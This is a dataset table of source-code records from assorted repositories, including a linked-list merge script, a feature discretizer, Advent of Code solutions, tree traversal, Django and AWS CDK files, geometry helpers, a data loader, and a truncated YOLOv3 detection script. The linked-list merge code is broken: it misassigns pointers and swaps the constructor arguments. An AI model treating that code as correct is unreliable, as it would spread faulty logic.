max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
linked_list.py | Umesh8Joshi/codewars_solutions | 0 | 12757351 | # program to merge two linked list
class Node:
def __init__(self, data, next):
self.data = data
self.next = next
def merge(L1,L2):
L3 = Node(None, None)
prev = L3
while L1 != None and L2 != None:
if L1.data <= L2.data:
prev.next = L2.data
L1 = L1.next
else:
prev.data = L1.data
L2 = L2.next
prev = prev.next
if L1.data == None:
prev.next = L2
elif L2.data == None:
prev.next = L1
return L3.next
if __name__ == '__main__':
n3 = Node(10, None)
n2 = Node(n3, 7)
n1 = Node(n2, 5)
L1 = n1
n7 = Node(12, None)
n6 = Node(n7, 9)
n5 = Node(n6, 6)
n4 = Node(n5, 2)
L2 = n4
merged = merge(L1, L2)
while merged != None:
print(str(merged.data) + '->')
merged = merged.next
print('None') | 4.21875 | 4 |
wittgenstein/discretize.py | imoscovitz/ruleset | 64 | 12757352 | # Author: <NAME> <<EMAIL>>
# License: MIT
from copy import deepcopy
from collections import defaultdict
import numpy as np
import pandas as pd
from wittgenstein.base_functions import truncstr
from wittgenstein.utils import rnd
class BinTransformer:
def __init__(self, n_discretize_bins=10, names_precision=2, verbosity=0):
self.n_discretize_bins = n_discretize_bins
self.names_precision = names_precision
self.verbosity = verbosity
self.bins_ = None
def __str__(self):
return str(self.bins_)
__repr__ = __str__
def __bool__(self):
return not not self.bins_
def isempty(self):
return not self.bins_ is None and not self.bins_
def fit_or_fittransform_(self, df, ignore_feats=[]):
"""Transform df using pre-fit bins, or, if unfit, fit self and transform df"""
# Binning has already been fit
if self.bins_:
return self.transform(df)
# Binning disabled
elif not self.n_discretize_bins:
return df
# Binning enabled, and binner needs to be fit
else:
self.fit(df, ignore_feats=ignore_feats)
df, bins = self.transform(df, ignore_feats=ignore_feats)
self.bins = bins
return df
def fit_transform(self, df, ignore_feats=[]):
self.fit(df, ignore_feats=ignore_feats)
return self.transform(df)
def fit(self, df, output=False, ignore_feats=[]):
"""
Returns a dict defining fits for numerical features
A fit is an ordered list of tuples defining each bin's range (min is exclusive; max is inclusive)
Returned dict allows for fitting to training data and applying the same fit to test data
to avoid information leak.
"""
def _fit_feat(df, feat):
"""Return list of tuples defining bin ranges for a numerical feature using simple linear search"""
if len(df) == 0:
return []
n_discretize_bins = min(self.n_discretize_bins, len(df[feat].unique()))
# Collect intervals
bins = pd.qcut(
df[feat],
q=self.n_discretize_bins,
precision=self.names_precision,
duplicates="drop",
)
if (
len(bins.unique()) < 2
): # qcut can behave weirdly in heavily-skewed distributions
bins = pd.cut(
df[feat],
bins=self.n_discretize_bins,
precision=self.names_precision,
duplicates="drop",
)
# Drop empty bins and duplicate intervals to create bins
bin_counts = bins.value_counts()
bins = bin_counts[bin_counts > 0].index
bins = sorted(bins.unique())
# Extend min/max to -inf, +inf to capture any ranges not present in training set
bins[0] = pd.Interval(float("-inf"), bins[0].right)
bins[-1] = pd.Interval(bins[-1].left, float("inf"))
bins = self._intervals_to_strs(bins)
if self.verbosity >= 3:
print(
f"{feat}: fit {len(df[feat].unique())} unique vals into {len(bins)} bins"
)
return bins
# Begin fitting
feats_to_fit = self.find_continuous_feats(df, ignore_feats=ignore_feats)
if feats_to_fit:
if self.verbosity == 1:
print(f"discretizing {len(feats_to_fit)} features")
elif self.verbosity == 2:
print(f"discretizing {len(feats_to_fit)} features: {feats_to_fit}\n")
self.bins_ = {}
for feat in feats_to_fit:
self.bins_[feat] = _fit_feat(df, feat)
return self.bins_
def transform(self, df):
"""Transform DataFrame using fit bins."""
def _transform_feat(df, feat):
if self.bins_ is None:
return df
res = deepcopy(df[feat])
bins = self._strs_to_intervals(self.bins_[feat])
res = pd.cut(df[feat], bins=pd.IntervalIndex(bins))
res = res.map(
lambda x: {i: s for i, s in zip(bins, self.bins_[feat])}.get(x)
)
return res
# Exclude any feats already transformed into valid intervals
already_transformed_feats = self._find_transformed(df, raise_invalid=True)
res = df.copy()
for feat in self.bins_.keys():
if feat in res.columns and feat not in already_transformed_feats:
res[feat] = _transform_feat(res, feat)
return res
def find_continuous_feats(self, df, ignore_feats=[]):
"""Return names of df features that seem to be continuous."""
if not self.n_discretize_bins:
return []
# Find numeric features
cont_feats = df.select_dtypes(np.number).columns
# Remove discrete features
cont_feats = [
f for f in cont_feats if len(df[f].unique()) > self.n_discretize_bins
]
# Remove ignore features
cont_feats = [f for f in cont_feats if f not in ignore_feats]
return cont_feats
def _strs_to_intervals(self, strs):
return [self._str_to_interval(s) for s in strs]
def _str_to_interval(self, s):
floor, ceil = self._str_to_floor_ceil(s)
return pd.Interval(floor, ceil)
def _intervals_to_strs(self, intervals):
"""Replace a list of intervals with their string representation."""
return [self._interval_to_str(interval) for interval in intervals]
def _interval_to_str(self, interval):
if interval.left == float("-inf"):
return f"<{interval.right}"
elif interval.right == float("inf"):
return f">{interval.left}"
else:
return f"{interval.left}-{interval.right}"
def _str_to_floor_ceil(self, value):
"""Find min, max separated by a dash""" # . Return None if invalid pattern."""
if "<" in value:
floor, ceil = "-inf", value.replace("<", "")
elif ">" in value:
floor, ceil = value.replace(">", ""), "inf"
else:
split_idx = 0
for i, char in enumerate(value):
# Found a possible split and it's not the first number's minus sign
if char == "-" and i != 0:
if split_idx is not None and not split_idx:
split_idx = i
# Found a - after the split, and it's not the minus of a negative number
elif i > split_idx + 1:
return None
floor = value[:split_idx]
ceil = value[split_idx + 1 :]
return float(floor), float(ceil)
def construct_from_ruleset(self, ruleset):
MIN_N_DISCRETIZED_BINS = 10
bt = BinTransformer()
bt.bins_ = self._bin_prediscretized_features(ruleset)
bt.n_discretize_bins = (
max(
(MIN_N_DISCRETIZED_BINS, max([len(bins) for bins in bt.bins_.values()]))
)
if bt.bins_
else MIN_N_DISCRETIZED_BINS
)
bt.names_precision = self._max_dec_precision(bt.bins_)
return bt
def _bin_prediscretized_features(self, ruleset):
def is_valid_decimal(s):
try:
float(s)
except:
return False
return True
def find_floor_ceil(value):
"""id min, max separated by a dash. Return None if invalid pattern."""
split_idx = 0
for i, char in enumerate(value):
# Found a possible split and it's not the first number's minus sign
if char == "-" and i != 0:
if split_idx is not None and not split_idx:
split_idx = i
# Found a - after the split, and it's not the minus of a negative number
elif i > split_idx + 1:
return None
floor = value[:split_idx]
ceil = value[split_idx + 1 :]
if is_valid_decimal(floor) and is_valid_decimal(ceil):
return (floor, ceil)
else:
return None
# _bin_prediscretized_features
discrete = defaultdict(list)
for cond in ruleset.get_conds():
floor_ceil = self.find_floor_ceil(cond.val)
if floor_ceil:
discrete[cond.feature].append(floor_ceil)
for feat, ranges in discrete.items():
ranges.sort(key=lambda x: float(x[0]))
return dict(discrete)
def _max_dec_precision(self, bins_dict):
def dec_precision(value):
try:
return len(value) - value.index(".") - 1
except:
return 0
max_prec = 0
for bins in bins_dict.values():
for bin_ in bins:
for value in bin_:
cur_prec = dec_precision(value)
if cur_prec > max_prec:
max_prec = cur_prec
return max_prec
def _find_transformed(self, df, raise_invalid=True):
"""Find columns that appear to have already been transformed. Raise error if there is a range that doesn't match a fit bin."""
check_feats = df.select_dtypes(include=["category", "object"]).columns.tolist()
invalid_feats = {}
transformed_feats = []
for feat, bins in self.bins_.items():
if feat in check_feats:
transformed_feats.append(feat)
invalid_values = set(df[feat].tolist()) - set(bins)
if invalid_values:
invalid_feats[feat] = invalid_values
if invalid_feats and raise_invalid:
raise ValueError(
f"The following input values seem to be transformed but ranges don't match fit bins: {invalid_feats}"
)
return transformed_feats
| 2.90625 | 3 |
python/src/aoc/year2017/day22.py | ocirne/adventofcode | 1 | 12757353 | from collections import defaultdict
from aoc.util import load_example, load_input
def prepare_map(lines):
result = defaultdict(lambda: ".")
for y, line in enumerate(lines):
for x, c in enumerate(line):
if c == "#":
result[x, y] = "#"
return result, (len(lines) - 1) // 2
MOVEMENTS = {
0: (0, -1),
1: (1, 0),
2: (0, 1),
3: (-1, 0),
}
CLEAN = "."
WEAKENED = "W"
INFECTED = "#"
FLAGGED = "F"
def part1(lines, n=10000):
"""
>>> part1(load_example(__file__, "22"), 7)
5
>>> part1(load_example(__file__, "22"), 70)
41
>>> part1(load_example(__file__, "22"))
5587
"""
grid, mxy = prepare_map(lines)
cx = cy = mxy
direction = 0
infection_counter = 0
for _ in range(n):
if grid[cx, cy] == "#":
direction = (direction + 1) % 4
grid[cx, cy] = "."
else:
direction = (direction + 3) % 4
grid[cx, cy] = "#"
infection_counter += 1
dx, dy = MOVEMENTS[direction]
cx += dx
cy += dy
return infection_counter
def part2(lines, n=10000000):
"""
>>> part2(load_example(__file__, "22"), 100)
26
>>> part2(load_example(__file__, "22"))
2511944
"""
grid, mxy = prepare_map(lines)
cx = cy = mxy
direction = 0
infection_counter = 0
for _ in range(n):
current = grid[cx, cy]
if current == CLEAN:
grid[cx, cy] = WEAKENED
direction = (direction + 3) % 4
elif current == WEAKENED:
grid[cx, cy] = INFECTED
infection_counter += 1
elif current == INFECTED:
grid[cx, cy] = FLAGGED
direction = (direction + 1) % 4
elif current == FLAGGED:
grid[cx, cy] = CLEAN
direction = (direction + 2) % 4
else:
raise
dx, dy = MOVEMENTS[direction]
cx += dx
cy += dy
return infection_counter
if __name__ == "__main__":
data = load_input(__file__, 2017, "22")
print(part1(data))
print(part2(data))
| 2.84375 | 3 |
preorderTraversal.py | GolferChen/LeetCode | 0 | 12757354 | <gh_stars>0
from typing import List
from collections import deque
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
# # Recursive Version
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# if root is None:
# return deque([])
# orders = deque([root.val])
# if root.left is None and root.right is None:
# return orders
# left_orders = self.preorderTraversal(root.left)
# right_orders = self.preorderTraversal(root.right)
# orders += left_orders
# orders += right_orders
# return orders
# Iteration Version, Wrong
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# if root is None:
# return []
# stack = deque([root])
# visited = deque([root])
# orders = [root.val]
# if root.left is None and root.right is None:
# return orders
# cur = root.left
# while len(stack) > 0:
# while cur and (not (cur in visited)):
# orders.append(cur.val)
# visited.append(cur)
# stack.append(cur)
# cur = cur.left
# cur_tmp = cur
# if cur is None:
# if len(stack) > 0:
# parent = stack.pop()
# if parent.right is None:
# if len(stack) > 0:
# parent_2 = stack.pop()
# cur = parent_2
# cur = cur.left
# else:
# cur = parent.right
# if not (cur is None):
# stack.append(cur)
# visited.append(cur)
# orders.append(cur.val)
# cur = cur.left
# if cur_tmp in visited:
# cur = cur_tmp.right
# if not (cur is None):
# stack.append(cur)
# visited.append(cur)
# orders.append(cur.val)
# cur = cur.left
# return orders
# # Iteration Version
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# stack = deque([root])
# # visited = deque([root]) # no need
# output = []
# while len(stack) > 0:
# cur = stack.pop()
# if not (cur is None): # in case that root is None
# if not (cur.right is None): # first right
# stack.append(cur.right)
# output.append(cur.val)
# if not (cur.left is None): # then left
# stack.append(cur.left)
# return output
# Iteration Version, Morris
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
output = []
cur = root
while not (cur is None):
if cur.left is None:
output.append(cur.val)
cur = cur.right
else:
predecessor = cur.left
while not (predecessor.right is None or predecessor.right == cur):
predecessor = predecessor.right
if predecessor.right is None:
predecessor.right = cur
output.append(cur.val)
# cur = predecessor
cur = cur.left
else:
predecessor.right = None
# output.append(cur.val) # already visited
cur = cur.right
return output
| 3.6875 | 4 |
tests/test_scope_finder.py | yoshrote/boss | 0 | 12757355 | <gh_stars>0
import json
import unittest
import mock
from boss.config import Configurator
from boss.scope_finder import (
initialize_scope_finder,
MemoryScopeFinder,
SQLScopeFinder
)
class ScopeFinderTests(unittest.TestCase):
def test_initialize_task_finder(self):
""" Test that known and arbitrary values are handled properly"""
mock_config = mock.Mock(spec=Configurator)
mock_config.connections = mock.MagicMock()
self.assertIsInstance(
initialize_scope_finder(
mock_config,
{'type': 'hardcoded', 'scopes': []}
),
MemoryScopeFinder
)
self.assertIsInstance(
initialize_scope_finder(
mock_config,
{'type': 'sqlite', 'connection': 'test'}
),
SQLScopeFinder
)
self.assertRaises(
ValueError,
initialize_scope_finder,
mock_config, {'type': 'task_finder.that.does.not:exist'}
)
self.assertRaises(
ValueError,
initialize_scope_finder,
mock_config, {'type': 'datetime:datetime'}
)
@mock.patch('sqlite3.Connection')
def test_sql_find(self, sql_mock):
""" Test SQLScopeFinder.find"""
mock_config = mock.Mock(spec=Configurator)
mock_config.connections = {'test': sql_mock}
scope_config = {'type': 'sqlite', 'connection': 'test'}
scope_finder = SQLScopeFinder.from_configs(
mock_config,
scope_config
)
cursor_mock = sql_mock.cursor.return_value
cursor_mock.execute.return_value = iter([
{'params': json.dumps({'foo': 1})},
{'params': json.dumps({'foo': 2})}
])
scope_name = 'foo'
self.assertEqual(
sorted(scope_finder.find(scope_name), key=lambda x: x['foo']),
[{'foo': 1}, {'foo': 2}]
)
def test_memory_find(self):
""" Test MemoryScopeFinder.find"""
mock_config = mock.Mock(spec=Configurator)
scope_config = {
'type': 'hardcoded',
'scopes': {
'foo': [
{'foo': 1},
{'foo': 2}
]
}
}
scope_finder = MemoryScopeFinder.from_configs(
mock_config,
scope_config
)
self.assertEqual(
sorted(scope_finder.find('foo'), key=lambda x: x['foo']),
[{'foo': 1}, {'foo': 2}]
)
if __name__ == '__main__':
unittest.main()
| 2.453125 | 2 |
cflearn/modules/heads/base.py | SaizhuoWang/carefree-learn | 0 | 12757356 | <reponame>SaizhuoWang/carefree-learn
import torch
import numpy as np
import torch.nn as nn
from abc import abstractmethod
from abc import ABCMeta
from typing import Any
from typing import Dict
from typing import Type
from typing import Union
from typing import Callable
from typing import Optional
from cftool.misc import register_core
from ..transform import Dimensions
from ...types import tensor_dict_type
from ...configs import configs_dict
from ...configs import Configs
from ...protocol import DataProtocol
from ...misc.toolkit import LoggingMixinWithRank
head_dict: Dict[str, Type["HeadBase"]] = {}
class HeadConfigs(Configs, metaclass=ABCMeta):
def __init__(
self,
in_dim: int,
tr_data: DataProtocol,
tr_weights: Optional[np.ndarray],
dimensions: Dimensions,
config: Optional[Dict[str, Any]] = None,
):
super().__init__(config)
self.in_dim = in_dim
self.tr_data = tr_data
self.tr_weights = tr_weights
self.dimensions = dimensions
@property
def out_dim(self) -> int:
out_dim = self.config.get("out_dim")
if self.tr_data.is_clf:
default_out_dim = self.tr_data.num_classes
else:
default_out_dim = self.tr_data.processed.y.shape[1]
if out_dim is None:
out_dim = default_out_dim
return out_dim
def inject_dimensions(self, config: Dict[str, Any]) -> None:
config["in_dim"] = self.in_dim
config["out_dim"] = self.out_dim
config["dimensions"] = self.dimensions
@classmethod
def get(
cls,
scope: str,
name: str,
*,
in_dim: Optional[int] = None,
tr_data: Optional[DataProtocol] = None,
tr_weights: Optional[np.ndarray] = None,
dimensions: Optional[Dimensions] = None,
**kwargs: Any,
) -> "HeadConfigs":
if in_dim is None:
raise ValueError("`in_dim` must be provided for `HeadConfigs`")
if tr_data is None:
raise ValueError("`tr_data` must be provided for `HeadConfigs`")
if dimensions is None:
raise ValueError("`dimensions` must be provided for `HeadConfigs`")
cfg_type = configs_dict[scope][name]
if not issubclass(cfg_type, HeadConfigs):
raise ValueError(f"'{name}' under '{scope}' scope is not `HeadConfigs`")
return cfg_type(in_dim, tr_data, tr_weights, dimensions, kwargs)
class HeadBase(nn.Module, LoggingMixinWithRank, metaclass=ABCMeta):
def __init__(self, in_dim: int, out_dim: int, **kwargs: Any):
super().__init__()
self.in_dim, self.out_dim = in_dim, out_dim
self.dimensions: Dimensions = kwargs["dimensions"]
@abstractmethod
def forward(self, net: torch.Tensor) -> Union[torch.Tensor, tensor_dict_type]:
pass
@classmethod
def register(cls, name: str) -> Callable[[Type], Type]:
global head_dict
return register_core(name, head_dict)
@classmethod
def make(cls, name: str, config: Dict[str, Any]) -> "HeadBase":
return head_dict[name](**config)
__all__ = [
"head_dict",
"HeadConfigs",
"HeadBase",
]
| 2.03125 | 2 |
lambda-sqs-cdk/app.py | iobreaker/serverless-patterns | 2 | 12757357 | #!/usr/bin/env python3
from aws_cdk import App
from lambda_sqs_cdk.lambda_sqs_cdk_stack import LambdaSqsCdkStack
app = App()
LambdaSqsCdkStack(app, "LambdaSqsCdkStack")
app.synth()
| 1.507813 | 2 |
nodejs-scrapper/cron_config_example.py | MichalSkoula/pi-dashboard-2 | 0 | 12757358 | <reponame>MichalSkoula/pi-dashboard-2
local_webserver = '/var/www/html'
ssh = dict(
host = '',
username = '',
password = '',
remote_path = ''
)
| 1.617188 | 2 |
apps/core/base/urls.py | GMNaim/Online-Exam-System | 0 | 12757359 | <gh_stars>0
from django.urls import path, include
from .views import dashboard
app_name = 'base'
urlpatterns = [
path('api/', include('apps.core.base.api.urls')),
path('', dashboard, name='dashboard'),
]
| 1.53125 | 2 |
Rect.py | Triumph-Z/PR1956 | 0 | 12757360 | <reponame>Triumph-Z/PR1956<filename>Rect.py
#includes functions related with Rect computation
import numpy as np
import cv2
from shapely.geometry import Polygon
def AreaOfOverlap(rect1,rect2,rect=True):
#return the size of intersection area of rect1 and rect2
if rect:
plg1 = Polygon(cv2.boxPoints(tuple(rect1)))
plg2 = Polygon(cv2.boxPoints(tuple(rect2)))
return plg1.intersection(plg2).area
def CombineRects(rect1,rect2):
#return a minAreaRect which contains rect1 and rect2
pts1=cv2.boxPoints(tuple(rect1))
pts2=cv2.boxPoints(tuple(rect2))
pts=np.concatenate((pts1,pts2),axis=0)
return cv2.minAreaRect(pts)
def DistOfRects(rect1,rect2):
#return the L2 distance of centers of two rects
c1,c2=np.array(rect1[0]),np.array(rect2[0])
return np.sum((c1-c2)**2)**0.5
def RectOnDstImg(rect, M_src2dst,flag_box=False):
# Given rect on src img, and transformation M from src to dst, return the rect on dst img.
if flag_box:
pts=PtsOnDstImg(rect,M_src2dst)
else:
pts=PtsOnDstImg(cv2.boxPoints(tuple(rect)), M_src2dst)
return cv2.minAreaRect(pts)
def PtsOnDstImg(pts, M_src2dst, orderPts=True):
#Given pts on src img, and transformation M from src to dst, return the pts on dst img.
pts = np.array(pts)
pts = np.concatenate((pts, np.ones([pts.shape[0], 1])), axis=1)
# pts on the dst img
pts = np.dot(M_src2dst, pts.T).T
pts = pts / pts[:, 2, None]
pts = np.int0(pts[:,0:2]+0.5)
if orderPts:
return OrderPoints(pts)
return pts
def OrderPoints(pts):
# sort the points based on their x-coordinates
xSorted = pts[np.argsort(pts[:, 0]), :]
# grab the left-most and right-most points from the sorted
# x-roodinate points
leftMost = xSorted[:2, :]
rightMost = xSorted[2:, :]
# now, sort the left-most coordinates according to their
# y-coordinates so we can grab the top-left and bottom-left
# points, respectively
leftMost = leftMost[np.argsort(leftMost[:, 1]), :]
(tl, bl) = leftMost
rightMost = rightMost[np.argsort(rightMost[:, 1]), :]
(tr, br) = rightMost
return np.array([tl, tr, br, bl])
def CropRect(img, rect):
#crop img w.r.t. rect, return the warped img and the transformation M (from src to dst)
pts = cv2.boxPoints(tuple(rect)) # e.g. [[0,0],[0,1],[1,1],[1,0]] <==> ((0.5, 0.5), (1.0, 1.0), -90.0)
pts = OrderPoints(pts)
# get width and height of the detected rectangle
if rect[2] < -45:
height, width = int(rect[1][0]), int(rect[1][1])
else:
width, height = int(rect[1][0]), int(rect[1][1])
src_pts = pts.astype("float32")
# corrdinate of the points in box points after the rectangle has been straightened
dst_pts = np.array([[0, 0],
[width, 0],
[width, height],
[0, height]], dtype="float32")
# the perspective transformation matrix
M = cv2.getPerspectiveTransform(src_pts, dst_pts)
# directly warp the rotated rectangle to get the straightened rectangle
warped = cv2.warpPerspective(img, M, (width+1, height+1))
return warped, M | 2.296875 | 2 |
dlgpd/data/loader.py | EmbodiedVision/dlgpd | 6 | 12757361 | <gh_stars>1-10
from collections import defaultdict, namedtuple
from itertools import islice
from pathlib import Path
import gym
import torch
from sacred import Ingredient
from torch.utils.data import DataLoader
from torchvision import transforms
from .dataset import RolloutDataset
from .envs import register_envs, ENV_INFO_PENDULUM
from ..models import Belief
MODULE_PATH = Path(__file__).parent.parent.parent
data_ingredient = Ingredient("data")
@data_ingredient.config
def data_cfg():
task_name = "pendulum"
batch_size_pairs = 1024
batch_size_chunks = 16
shuffle_batches_pairs = True
shuffle_batches_chunks = True
subset_shuffle_seed = None
rollout_length = 30
chunk_length = 30
data_base_dir = str(MODULE_PATH.joinpath("data"))
@data_ingredient.capture
def get_random_collection_env(task_name, variation_name=None):
env_info = get_env_info(task_name)
env_name = env_info.env_name
env_kwargs = env_info.data_collection_kwargs
if variation_name is not None:
env_kwargs = dict(**env_kwargs, **env_info.variation_kwargs[variation_name])
return env_name, env_kwargs
@data_ingredient.capture
def get_control_env(task_name, variation_name=None):
env_info = get_env_info(task_name)
env_name = env_info.env_name
env_kwargs = env_info.ctrl_env_kwargs
if variation_name is not None:
env_kwargs = dict(**env_kwargs, **env_info.variation_kwargs[variation_name])
return env_name, env_kwargs
def make_env(env_name, env_kwargs):
register_envs()
return gym.make(env_name, **env_kwargs)
@data_ingredient.capture
def get_env_info(task_name):
if task_name == "pendulum":
return ENV_INFO_PENDULUM
else:
raise ValueError(f"No env_info for {task_name}")
def gaussian_noise(tensor):
tensor += 0.01 * torch.randn_like(tensor)
tensor = torch.clamp(tensor, 0, 1)
return tensor
def encode_batch_of_pairs(batch, vae):
latent_current = vae.encode_sequence(batch["rendering_history"].current)
latent_next = vae.encode_sequence(batch["rendering_history"].next)
# remove additional sliding window dimension introduced by "encode_sequence"
latent_current = Belief(*[k.squeeze(0) for k in latent_current])
latent_next = Belief(*[k.squeeze(0) for k in latent_next])
return TransitionTuple(current=latent_current, next=latent_next)
TransitionTuple = namedtuple("TransitionTuple", ["current", "next"])
class DataHandler(object):
def __init__(
self,
chunk_dataset,
pair_dataset,
chunk_length,
batch_size_chunks,
batch_size_pairs,
shuffle_batches_chunks,
shuffle_batches_pairs,
):
self._chunk_dataset = chunk_dataset
self._pair_dataset = pair_dataset
self._chunk_loader_sequential, self._chunk_loader_shuffled = [
DataLoader(
chunk_dataset,
batch_size=batch_size_chunks,
shuffle=shuffle,
drop_last=False,
num_workers=1,
)
for shuffle in [False, shuffle_batches_chunks]
]
self._pair_loader_sequential, self._pair_loader_shuffled = [
DataLoader(
pair_dataset,
batch_size=batch_size_pairs,
shuffle=shuffle,
drop_last=False,
num_workers=1,
)
for shuffle in [False, shuffle_batches_pairs]
]
self._n_chunks = len(chunk_dataset)
self._chunk_length = chunk_length
@property
def chunk_loader(self):
return self._chunk_loader_shuffled
@property
def pair_loader(self):
return map(self._process_pair_batch, self._pair_loader_shuffled)
@property
def n_chunks(self):
return self._n_chunks
@property
def chunk_length(self):
return self._chunk_length
def get_chunks_as_batch(self, max_chunks=None):
keys = ["action", "reward", "observation", "rendering"]
accumulated_chunk_data = {k: [] for k in keys}
for chunk_data in self.chunk_iterator(max_chunks):
for k in keys:
accumulated_chunk_data[k].append(
torch.as_tensor(chunk_data[k]).float().cuda()
)
stacked_chunk_data = {
k: torch.stack(v, dim=1) for k, v in accumulated_chunk_data.items()
}
return stacked_chunk_data
def chunk_iterator(self, max_chunks=None):
keys = ["action", "reward", "observation", "rendering"]
_it = range(len(self._chunk_dataset))
if max_chunks is not None:
_it = islice(_it, max_chunks)
for chunk_idx in _it:
yield {
k: torch.as_tensor(self._chunk_dataset[chunk_idx][k]).float().cuda()
for k in keys
}
def get_pairs_as_batch(self, max_pairs=None):
acc_batch = defaultdict(list)
items_missing = max_pairs
for batch in self._pair_loader_shuffled:
bs = len(batch[list(batch.keys())[0]])
if max_pairs is not None:
for k, v in batch.items():
acc_batch[k].append(v[:items_missing])
items_missing -= bs
if items_missing <= 0:
break
else:
for k, v in batch.items():
acc_batch[k].append(v)
for k, v in acc_batch.items():
if isinstance(v, (list, tuple)) and isinstance(v[0], torch.Tensor):
acc_batch[k] = torch.cat(v, dim=0)
return self._process_pair_batch(acc_batch)
def _process_pair_batch(self, pair_batch):
t_b_dim_batch = {
k: t.transpose(0, 1).float().cuda()
for k, t in pair_batch.items()
if k in ["action", "reward", "observation", "rendering"]
}
# action applied to second-to-last state
action = t_b_dim_batch["action"][-2, ...]
# reward collected when entering last state
reward = t_b_dim_batch["reward"][-1, ...]
observation = TransitionTuple(
current=t_b_dim_batch["observation"][-2, ...],
next=t_b_dim_batch["observation"][-1, ...],
)
rendering = TransitionTuple(
current=t_b_dim_batch["rendering"][-2, ...],
next=t_b_dim_batch["rendering"][-1, ...],
)
rendering_history = TransitionTuple(
current=t_b_dim_batch["rendering"][:-1, ...],
next=t_b_dim_batch["rendering"][1:, ...],
)
return dict(
action=action,
reward=reward,
observation=observation,
rendering=rendering,
rendering_history=rendering_history,
)
def load_processed_train_batch(config, vae, max_pairs, with_observation=False):
# Train data for inferring the scaling
env_name, env_kwargs = get_random_collection_env(config["data"]["task_name"])
train_data = load_data(
env_name,
env_kwargs,
split_name="train",
n_rollouts_total=config["n_train_rollouts_total"],
n_rollouts_subset=config["n_train_rollouts_subset"],
rollout_length=config["data"]["rollout_length"],
chunk_length=config["data"]["chunk_length"],
batch_size_chunks=1,
batch_size_pairs=1024,
shuffle_batches_chunks=True,
shuffle_batches_pairs=True,
data_base_dir=config["data"]["data_base_dir"],
subset_shuffle_seed=config["data"]["subset_shuffle_seed"],
)
pair_batch = train_data.get_pairs_as_batch(max_pairs=max_pairs)
with torch.no_grad():
latent = encode_batch_of_pairs(pair_batch, vae)
action = pair_batch["action"]
reward = pair_batch["reward"]
if with_observation:
observation = pair_batch["observation"]
return latent, action, reward, observation
else:
return latent, action, reward
@data_ingredient.capture
def load_data(
env_name,
env_kwargs,
split_name,
n_rollouts_total,
n_rollouts_subset,
rollout_length,
chunk_length,
batch_size_chunks,
batch_size_pairs,
shuffle_batches_chunks,
shuffle_batches_pairs,
data_base_dir,
subset_shuffle_seed,
):
"""
Parameters
----------
env_name
env_kwargs
split_name
n_rollouts_total
n_rollouts_subset
rollout_length
batch_size_chunks
batch_size_pairs
subset_shuffle_seed
Returns
-------
"""
register_envs()
image_transform = transforms.Compose([transforms.ToTensor(), gaussian_noise])
print("Loading chunks...")
chunk_dataset = RolloutDataset(
data_base_dir=data_base_dir,
split_name=split_name,
env_name=env_name,
env_kwargs=env_kwargs,
n_rollouts_total=n_rollouts_total,
n_rollouts_subset=n_rollouts_subset,
rollout_length=rollout_length,
rollout_subset_sampling_seed=subset_shuffle_seed,
subsequence_length=chunk_length,
image_transform=image_transform,
)
print("Loading transitions...")
pair_dataset = RolloutDataset(
data_base_dir=data_base_dir,
split_name=split_name,
env_name=env_name,
env_kwargs=env_kwargs,
n_rollouts_total=n_rollouts_total,
n_rollouts_subset=n_rollouts_subset,
rollout_length=rollout_length,
rollout_subset_sampling_seed=subset_shuffle_seed,
subsequence_length=3,
image_transform=image_transform,
)
return DataHandler(
chunk_dataset,
pair_dataset,
chunk_length,
batch_size_chunks=batch_size_chunks,
batch_size_pairs=batch_size_pairs,
shuffle_batches_chunks=shuffle_batches_chunks,
shuffle_batches_pairs=shuffle_batches_pairs,
)
| 2.03125 | 2 |
info/migrations/0016_alter_attendanceclass_options.py | theluney/DataBase-project | 0 | 12757362 | # Generated by Django 3.2 on 2021-04-22 17:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('info', '0015_attendancerange'),
]
operations = [
migrations.AlterModelOptions(
name='attendanceclass',
options={'verbose_name': 'Attendance', 'verbose_name_plural': 'Attendance'},
),
]
| 1.390625 | 1 |
blackmamba/lib/future/moves/subprocess.py | oz90210/blackmamba | 2,151 | 12757363 | from __future__ import absolute_import
from future.utils import PY2, PY26
from subprocess import *
if PY2:
__future_module__ = True
from commands import getoutput, getstatusoutput
if PY26:
from future.backports.misc import check_output
| 1.570313 | 2 |
YOLOv3_video.py | HarryPham0123/YOLOv3-object-detection | 3 | 12757364 | import cv2
import numpy as np
import argparse
# we are not going to bother with objects less than 30% probability
THRESHOLD = 0.3
# the lower the value: the fewer bounding boxes will remain
SUPPRESSION_THRESHOLD = 0.3
YOLO_IMAGE_SIZE = 320
DATA_FOLDER = './data/'
CFG_FOLDER = './cfg/'
MODEL_FOLDER = './models/'
def find_objects(model_outputs):
"""
Extract the the values from prediction vectors resulted by the YOLOv3 algorithm
Returns:
box_indexes_to_keep: Idx of bounding boxes after applying "Non-max suppression"
bounding_box_locations: all vec (x, y, w, h) of each chosen bounding box
class_ids: idx for each predicted class of each bounding box based on COCO dataset's classes
confidence_values: Probability that the predicted class is correct
"""
bounding_box_locations = []
class_ids = []
confidence_values = []
# Iterate through each layers in YOLOv3 output (totally 3 layers)
for output in model_outputs:
# Iterate each bounding boxes in prediction output
for prediction in output:
class_probabilities = prediction[5:]
# "class_idx" index of object detection having the highest probability
class_idx = np.argmax(class_probabilities)
confidence = class_probabilities[class_idx]
# Only detect object having the confident larger than THRESHOLD
if confidence > THRESHOLD:
# B.c prediction[2] return between [0-1] --> Need to rescale it to match the position in 320*320 image
w, h = int(prediction[2] * YOLO_IMAGE_SIZE), int(prediction[3] * YOLO_IMAGE_SIZE)
# the center of the bounding box (we should transform these values)
x, y = int(prediction[0] * YOLO_IMAGE_SIZE - w / 2), int(prediction[1] * YOLO_IMAGE_SIZE - h / 2)
bounding_box_locations.append([x, y, w, h])
class_ids.append(class_idx)
confidence_values.append(float(confidence))
# Perform "Non-max suppression" for each prediction bounding boxes
box_indexes_to_keep = cv2.dnn.NMSBoxes(bounding_box_locations, confidence_values, THRESHOLD, SUPPRESSION_THRESHOLD)
